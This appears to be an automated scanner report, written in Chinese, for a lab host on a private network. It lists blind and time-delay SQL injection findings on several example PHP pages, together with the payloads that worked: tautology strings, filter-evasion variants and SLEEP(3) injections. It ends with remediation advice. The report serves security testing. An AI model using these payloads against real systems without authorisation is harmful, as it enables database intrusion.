目标：http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '	and	'95624'='95624
'	and	'60349'='60349
'	or	58735=58735#
'	and	'47623'='47624
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '	and	'95624'='95624
'	and	'60349'='60349
'	or	58735=58735#
'	and	'47623'='47624
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	28271=28271
	and	36250=36250
	or	57588=57588#
	and	72173=72174
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	28271=28271
	and	36250=36250
	or	57588=57588#
	and	72173=72174
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 	and	28271=28271
	and	36250=36250
	or	57588=57588#
	and	72173=72174
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
漏洞名称: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'90313'='90313
'/**/and/**/'95347'='95347
'/**/or/**/71148=71148#
'/**/and/**/'43825'='43826
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
漏洞名称: blind sqli
Query: {'id': '2'}
Payload: 
and
83733=83733

and
66682=66682

or
35293=35293#

and
81597=81598
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
漏洞名称: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'23672'='23672
'+and+'94822'='94822
'+or+78727=78727#
'+and+'24001'='24002
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
漏洞名称: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
漏洞名称: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
---
    防御SQL注入漏洞的建议：

    [1] 库或框架

        使用不允许此弱点出现的经过审核的库或框架，或提供更容易避免此弱点的构造。

    [2] 参数化

        如果可用，使用自动实施数据和代码之间的分离的结构化机制。这些机制也许能够自动提供相关引用、编码和验证，而不是依赖于开发者在生成输出的每一处提供此能力。

    [3] 环境固化

        使用完成必要任务所需的最低特权来运行代码。

    [4] 输出编码

        如果在有风险的情况下仍需要使用动态生成的查询字符串或命令，请对参数正确地加引号并将这些参数中的任何特殊字符转义。

    [5] 输入验证

        假定所有输入都是恶意的。使用“接受已知善意”输入验证策略：严格遵守规范的可接受输入的白名单。拒绝任何没有严格遵守规范的输入，或者将其转换为遵守规范的内容。不要完全依赖于通过黑名单检测恶意或格式错误的输入。但是，黑名单可帮助检测潜在攻击，或者确定哪些输入格式不正确，以致应当将其彻底拒绝

    